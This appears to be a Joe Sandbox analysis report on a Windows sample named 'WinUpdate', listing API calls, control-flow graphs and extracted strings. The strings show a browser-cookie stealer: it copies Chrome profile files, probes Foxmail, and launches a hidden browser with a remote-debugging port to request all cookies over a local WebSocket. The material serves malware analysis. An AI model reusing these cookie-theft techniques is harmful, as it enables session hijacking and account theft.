                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: Connection: Upgrade$ERROR: Could not parse WebSocket url: %s$ERROR: Got bad status connecting to %s: %s$ERROR: Got invalid status line connecting to: %s$GET /%s HTTP/1.1$HTTP/1.1 %d$Host: %s$Host: %s:%d$Origin: %s$P$Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==$Sec-WebSocket-Version: 13$Unable to connect to %s:%d$Upgrade: websocket$e$ws://%[^:/]$ws://%[^:/]/%s$ws://%[^:/]:%d$ws://%[^:/]:%d/%s
                                                                                                                                                                                                                                                                                                • API String ID: 0-1585909395
                                                                                                                                                                                                                                                                                                • Opcode ID: 12572963b92fc2fbb6932ee6605c50527e2d8c00a7f48e67dae44c0a149c157e
                                                                                                                                                                                                                                                                                                • Instruction ID: 8c5c428c0198e8a7c9dce20c2a40cf958e763ea39fc21358b4929ecef954cfc7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12572963b92fc2fbb6932ee6605c50527e2d8c00a7f48e67dae44c0a149c157e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1FE1F1B5900214AEFB14CF64DC85FEEB7B8EB05394F848195F609A7086D372AB49CF64

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,10006E4E), ref: 10007252
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 1000725B
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,10006E4E), ref: 1000726C
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 1000726F
                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,10006E4E), ref: 10007286
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 10007289
                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,10006E4E), ref: 1000729A
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 1000729D
                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,10006E4E), ref: 100072AE
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 100072B1
                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,10006E4E), ref: 100072C2
                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 100072C5
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                                                                                                                                                                • String ID: GetFinalPathNameByHandleW$NtQueryInformationProcess$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$Rstrtmgr$Rstrtmgr$Rstrtmgr$kernel32$ntdll
                                                                                                                                                                                                                                                                                                • API String ID: 4236061018-788455005
                                                                                                                                                                                                                                                                                                • Opcode ID: 15c6b04f8a56a6077895a4e2c88de4e1754fac2b079e60f4a3e8d9701f116bca
                                                                                                                                                                                                                                                                                                • Instruction ID: 04275e680396dfb4a641f74b6e8e1366635206651eabc041964a765234593f91
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15c6b04f8a56a6077895a4e2c88de4e1754fac2b079e60f4a3e8d9701f116bca
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38111F74C01228E9FA61FBF19CEDFA73A98FB40290FA10416F60953060C738564ADF94

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 126 10001f42-10001f98 call 10004330 CreateDirectoryW call 10004d80 * 2 133 10001f9a 126->133 134 10001f9c-10001fa0 126->134 133->134 135 10001fa2 134->135 136 10001fa4-10001fb4 CopyFileW 134->136 135->136 137 10001fc0-10001fe1 136->137 138 10001fb6-10001fbb call 10004160 136->138 140 10001ff0-10002052 call 10003a70 call 100067d0 137->140 141 10001fe3-10001feb call 10004160 137->141 138->137 149 100024f0-10002514 call 100038d0 140->149 150 10002058-1000205a 140->150 141->140 155 10002523-10002546 149->155 156 10002516-1000251e call 10004160 149->156 151 10002060-10002098 call 10004d80 150->151 158 10002590-1000259a call 1000a5c6 151->158 159 1000209e-100020cf call 10004e80 call 10004cc0 151->159 161 10002552-1000256c 155->161 162 10002548-1000254d call 10004160 155->162 156->155 173 100020d1-100020d6 call 10004160 159->173 174 100020db-100020f9 159->174 165 10002578-1000258a 161->165 166 1000256e-10002573 call 10004160 161->166 162->161 166->165 173->174 176 10002105-1000214e call 10004d80 174->176 177 100020fb-10002100 call 10004160 174->177 176->158 181 10002154-10002173 call 10004e80 176->181 177->176 184 10002175-1000217a call 10004160 181->184 185 1000217f-100021c9 call 10004d80 call 10004cc0 181->185 184->185 191 100021d5-1000227c CreateDirectoryW * 2 call 10004330 call 10004d80 * 2 185->191 192 100021cb-100021d0 call 10004160 185->192 191->158 200 10002282-100022b0 call 10004e80 call 10004cc0 191->200 192->191 205 100022b2 200->205 206 100022b4-100022b8 200->206 205->206 207 100022ba 206->207 208 100022bc-100022ce CopyFileW 206->208 207->208 209 100022d0-100022d5 call 10004160 208->209 210 100022da-100022f4 208->210 209->210 212 10002300-1000231d 210->212 213 100022f6-100022fb call 10004160 210->213 215 1000232c-10002356 212->215 216 1000231f-10002327 call 10004160 212->216 213->212 218 10002365-1000238c CopyFileW 215->218 219 10002358-10002360 call 10004160 215->219 216->215 221 10002392-100023e8 call 10006e60 CreateFileW 218->221 222 1000244e-10002454 218->222 219->218 230 10002405-1000240b 221->230 231 100023ea-100023ff WriteFile CloseHandle 221->231 223 10002460-1000247d 222->223 224 10002456-1000245b call 10004160 222->224 228 1000248c-100024b6 223->228 229 1000247f-10002487 call 10004160 223->229 224->223 233 100024c5-100024ea 228->233 234 100024b8-100024c0 call 10004160 228->234 229->228 235 1000244b 230->235 236 1000240d-10002416 230->236 231->230 233->149 233->151 234->233 235->222 238 10002442-10002448 call 1000a956 236->238 239 10002418-1000241b 236->239 238->235 241 10002421-10002426 239->241 242 1000258b call 1000daab 239->242 241->242 245 1000242c-10002431 241->245 242->158 245->242 246 10002437-1000243a 245->246 246->242 247 10002440 246->247 247->238
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,000000FF,?,00000000), ref: 10001F5F
                                                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 10001FA8
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CopyCreateDirectoryFile
                                                                                                                                                                                                                                                                                                • String ID: Network$User Data$\Cookies$\Local State$\Local State$\Network\Cookies$\Secure Preferences$\Secure Preferences$invalid vector<T> subscript$-
                                                                                                                                                                                                                                                                                                • API String ID: 3761107634-3418363220
                                                                                                                                                                                                                                                                                                • Opcode ID: 6543eb47e2eb3d4cb808ab73e9c761b45a59b7d1ab0deb3a85e919aee3a5a40f
                                                                                                                                                                                                                                                                                                • Instruction ID: d59edb435599a471555a78990484bb1f50df8ad1d5918936d629013e8b7aebb2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6543eb47e2eb3d4cb808ab73e9c761b45a59b7d1ab0deb3a85e919aee3a5a40f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20028AB0D002189FEF04CFA4DC85BEEBBB5FF58344F114499E80AAB255DB74AA85CB51

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 02E61434
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E610F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 02E61137
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E610F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 02E61151
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 02E6115C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 02E6116D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E610F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 02E6117C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E610F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 02E61193
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E610F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02E611D0
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E610F1: FindClose.KERNEL32(00000000), ref: 02E611DB
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 02E614C5
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 02E614E0
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 02E6150F
                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 02E61521
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 02E61547
                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 02E61553
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 02E61579
                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 02E61585
                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 02E615AB
                                                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 02E615B7
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                                                                                                                • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                                                                                                                • API String ID: 672098462-2938083778
                                                                                                                                                                                                                                                                                                • Opcode ID: a33de281609bcda026b235cab2f81acbca7fd1b9ce1656fbd2924f1a505b3860
                                                                                                                                                                                                                                                                                                • Instruction ID: 5dc7c631f5ab00b8f6e088ba99c8a517ec6190a342f42d6ca02f8394cba5198a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a33de281609bcda026b235cab2f81acbca7fd1b9ce1656fbd2924f1a505b3860
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E281B571A80358A9EB20D7A0DC45FEF7379EF44740F005596F909EB190EAB15A84CF95

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 286 100086b0-100086c0 287 100086c2-100086c7 286->287 288 1000870b-10008712 286->288 291 10008911-10008915 287->291 292 100086cd-10008708 select 287->292 289 100087a0-100087d0 call 100097d0 recv 288->289 290 10008718-10008762 288->290 297 100087f1-100087f4 289->297 298 100087d2-100087dd WSAGetLastError 289->298 293 10008774-10008798 select 290->293 294 10008764-1000876a 290->294 293->289 294->293 301 100087f6-100087fe call 100097d0 297->301 302 1000880b-10008840 call 100097d0 closesocket call 1000dd3f call 1000fc8d 297->302 299 10008800-10008809 call 100097d0 298->299 300 100087df-100087ea WSAGetLastError 298->300 310 10008843-10008849 299->310 300->299 304 100087ec-100087ef 300->304 301->289 302->310 304->297 313 100088f1-100088f9 310->313 314 1000884f 310->314 313->291 317 100088fb-100088ff 313->317 316 10008850-10008869 send 314->316 319 10008885 316->319 320 1000886b-10008878 WSAGetLastError 316->320 317->291 321 10008901-1000890a closesocket 317->321 323 100088c1-100088ee closesocket call 1000dd3f call 1000fc8d 319->323 324 10008887-10008891 319->324 320->313 322 1000887a-10008881 WSAGetLastError 320->322 321->291 322->313 328 10008883 322->328 323->313 325 10008893-10008896 324->325 326 1000889d-1000889f 324->326 325->326 329 10008898-1000889b 325->329 330 100088a1-100088b4 call 1000b3c0 326->330 331 100088b7-100088bd 326->331 328->319 329->331 330->331 331->316 334 100088bf 331->334 334->313
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • select.WS2_32(00000000,00000000,00000000,00000000,?), ref: 100086FE
                                                                                                                                                                                                                                                                                                • select.WS2_32(?,00000001,00000000,00000000,?), ref: 10008792
                                                                                                                                                                                                                                                                                                • recv.WS2_32(?,?,000005DC,00000000), ref: 100087C5
                                                                                                                                                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 100087D2
                                                                                                                                                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 100087DF
                                                                                                                                                                                                                                                                                                • send.WS2_32(?,?,?,00000000), ref: 1000885F
                                                                                                                                                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 10008871
                                                                                                                                                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 1000887A
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$select$recvsend
                                                                                                                                                                                                                                                                                                • String ID: Connection closed!$Connection error!
                                                                                                                                                                                                                                                                                                • API String ID: 4255854023-2305758303
                                                                                                                                                                                                                                                                                                • Opcode ID: 0d46c3478e19c6e22f50249a8fdc4e20d53f2accd10c7bd4b9f27cd91464bd76
                                                                                                                                                                                                                                                                                                • Instruction ID: ed442c2dc6cb281fd35b63cc094b2b61bff5b4e8b3b3f7628600f1f37b8170a4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d46c3478e19c6e22f50249a8fdc4e20d53f2accd10c7bd4b9f27cd91464bd76
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56719272A0060AAFE704DF64CC89B59B7B8FF54380F548226E549D6A55DB70FA90CF90

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 100076D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10007722
                                                                                                                                                                                                                                                                                                  • Part of subcall function 100076D0: Process32FirstW.KERNEL32(00000000,?), ref: 10007744
                                                                                                                                                                                                                                                                                                  • Part of subcall function 100076D0: CloseHandle.KERNEL32(00000000), ref: 1000774F
                                                                                                                                                                                                                                                                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,?,?,?,?), ref: 1000279E
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,100278DE,00000000,?,?,?,?), ref: 100028D2
                                                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 10002A9D
                                                                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?), ref: 10002AAB
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 10002ABA
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 10002ABF
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=", xrefs: 10002737
                                                                                                                                                                                                                                                                                                • {"id":1,"method":"Network.getAllCookies","params":{}}, xrefs: 10002962
                                                                                                                                                                                                                                                                                                • localhost, xrefs: 10002A48
                                                                                                                                                                                                                                                                                                • {"id":2,"method":"Browser.close"}, xrefs: 10002A3B
                                                                                                                                                                                                                                                                                                • localhost, xrefs: 1000296F
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseHandle$CreateProcess$FirstObjectProcess32SingleSleepSnapshotTerminateToolhelp32Wait
                                                                                                                                                                                                                                                                                                • String ID: --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="$localhost$localhost${"id":1,"method":"Network.getAllCookies","params":{}}${"id":2,"method":"Browser.close"}
                                                                                                                                                                                                                                                                                                • API String ID: 3739829977-2677655338
                                                                                                                                                                                                                                                                                                • Opcode ID: a8493153503855f6f9aab56b26d4e52f0d5b721a9f897e61feb5301597870884
                                                                                                                                                                                                                                                                                                • Instruction ID: 11f8c4d24fe82a6f86681b1c4a37eeeb5123bf1d696f215f8944f13cdd62a5a1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8493153503855f6f9aab56b26d4e52f0d5b721a9f897e61feb5301597870884
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DC1E974D00248DEFF15DBA4DC85BEEBBB5EF05384F108159E40AA325ADB316E45CB62

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 723 100067d0-10006849 call 10004d80 PathFileExistsW 726 10006897-100068b1 call 10004d80 723->726 727 1000684b-10006887 call 10003970 call 10006b40 723->727 733 100068e2-100068ec 726->733 734 100068b3-100068b9 726->734 744 1000693c 727->744 745 1000688d-10006892 727->745 735 100068f8-10006908 PathFileExistsW 733->735 736 100068ee-100068f3 call 10004160 733->736 738 100068c5-100068dd call 10003b90 734->738 739 100068bb-100068c0 call 10004160 734->739 743 1000690a-10006930 call 100034a0 call 10006b40 735->743 735->744 736->735 738->733 739->738 743->744 757 10006932-10006934 743->757 746 10006941-1000697a call 10007d50 call 10004d80 call 10006d90 744->746 748 10006937 call 10004160 745->748 760 100069ab-100069b1 746->760 761 1000697c-10006982 746->761 748->744 757->748 764 100069b3-100069b8 call 10004160 760->764 765 100069bd-100069d7 760->765 762 10006984-10006989 call 10004160 761->762 763 1000698e-100069a6 call 10003b90 761->763 762->763 763->760 764->765 766 100069e3-10006a01 765->766 767 100069d9-100069de call 10004160 765->767 772 10006a03-10006a08 call 10004160 766->772 773 10006a0d-10006a21 PathFileExistsW 766->773 767->766 772->773 775 10006a27-10006a4f call 10007d50 call 10004a00 773->775 776 10006ae9-10006aed 773->776 788 10006a51-10006a55 775->788 789 10006a8c-10006a92 775->789 776->746 778 10006af3-10006af9 776->778 779 10006b05-10006b1f 778->779 780 10006afb-10006b00 call 10004160 778->780 783 10006b21-10006b26 call 10004160 779->783 784 10006b2b-10006b3d 779->784 780->779 783->784 788->789 792 10006a57-10006a70 788->792 790 10006a94-10006a97 call 10006bc0 789->790 791 10006a9c-10006aa1 789->791 790->791 794 10006aa3 791->794 795 10006aa9-10006ab3 791->795 796 10006a72-10006a75 call 10006bc0 792->796 797 10006a7a-10006a87 792->797 799 10006aa4 call 10005030 794->799 800 10006ab5-10006aba call 10004160 795->800 801 10006abf-10006add 795->801 796->797 797->795 798 10006a89-10006a8a 797->798 798->799 799->795 800->801 801->776 805 10006adf-10006ae4 call 10004160 801->805 805->776
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • PathFileExistsW.SHLWAPI(?), ref: 10006845
                                                                                                                                                                                                                                                                                                • PathFileExistsW.SHLWAPI(?), ref: 10006904
                                                                                                                                                                                                                                                                                                • PathFileExistsW.SHLWAPI(?), ref: 10006A19
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                • String ID: Default$Default$Profile $User Data\Default$User Data\Profile $\Default
                                                                                                                                                                                                                                                                                                • API String ID: 1174141254-1565956251
                                                                                                                                                                                                                                                                                                • Opcode ID: 23bab477671af1dc14b169766e0ac29bc56a45cbfc4cf51a7bbc5a01153a05bb
                                                                                                                                                                                                                                                                                                • Instruction ID: a37d211fa08ad78f2eb18696fba1f90168a005bfae744a9f2f60b4d9e59cb154
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23bab477671af1dc14b169766e0ac29bc56a45cbfc4cf51a7bbc5a01153a05bb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82A16DB4D00248DEEF01DBA4DC85BEEBBBAFF48344F208019E415E7255DB34AA45CBA1

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=", xrefs: 10002737
                                                                                                                                                                                                                                                                                                • {"id":1,"method":"Network.getAllCookies","params":{}}, xrefs: 10002962
                                                                                                                                                                                                                                                                                                • D, xrefs: 1000263C
                                                                                                                                                                                                                                                                                                • localhost, xrefs: 1000296F
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
